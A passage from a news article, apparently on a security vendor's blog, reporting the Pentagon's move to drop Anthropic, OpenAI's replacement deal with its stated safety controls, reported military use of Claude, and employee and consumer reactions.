Dan W. Ball, senior fellow at the American Foundation for Innovation, called the Pengaton’s move “attempted corporate murder,” arguing that Google, Amazon, and NVIDIA would have to detach themselves from Anthropic if Hegseth got his way. Amazon is Anthropic’s primary cloud computing provider, but it also uses Google’s data centers extensively. Both companies are investors in Anthropic, as is NVIDIA, which also partners with the AI company on GPU engineering. If the Pentagon’s designation restricts federal contractors from integrating Anthropic technology into defense-related systems, those partners could be required to separate or ringfence any federal-facing work involving the company.
OpenAI steps in
In a whirlwind of policy changes by the US military, the Pentagon also signed a deal with ChatGPT creator OpenAI on Friday evening, just a few hours after dropping Anthropic.
OpenAI CEO Sam Altman said the agreement preserved the same principles Anthropic had been blacklisted for defending.
The difference, according to Altman, is the enforcement mechanism. Instead of hard contractual prohibitions, OpenAI accepted the “all lawful purposes” framework but layered on architectural controls: cloud-only deployment, a proprietary safety stack the Pentagon agreed not to override, and cleared engineers embedded forward. OpenAI said these protections made the company confident that the Pentagon couldn’t cross the red lines it shares with Anthropic.
Altman reportedly said Anthropic’s approach differed because it relied on specific contract language rather than existing legal protections, adding Anthropic “may have wanted more operational control than we did.”
The morning after
The policy dispute did not immediately change how existing systems were operating. According to reporting by The Wall Street Journal and Axios, US Central Command used Anthropic’s AI during Operation Epic Fury, a coordinated US–Israeli operation targeting Iran. The outlets reported that the system was used for intelligence assessment, target analysis, and operational modeling.
Claude remained in use because it was already embedded in certain classified military systems. As a senior defense official previously told Axios:
“It will be an enormous pain in the ass to disentangle, and we are going to make sure they pay a price for forcing our hand like this.”
Hegseth announced a six-month period during which the Pentagon will pick Anthropic’s AI out of its systems.
Consumers vote with their feet
The dispute has also prompted reactions from some AI industry employees and users. More than 875 employees across Google and OpenAI signed an open letter backing Anthropic’s stance. According to the letter:
“They’re trying to divide each company with fear that the other will give in. That strategy only works if none of us know where the others stand.”
A consumer boycott, organized under the name QuitGPT, is organizing a campaign to avoid using ChatGPT, along with a protest at OpenAI’s HQ this week. Claude also rocketed to the top of Apple’s App Store over the weekend.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.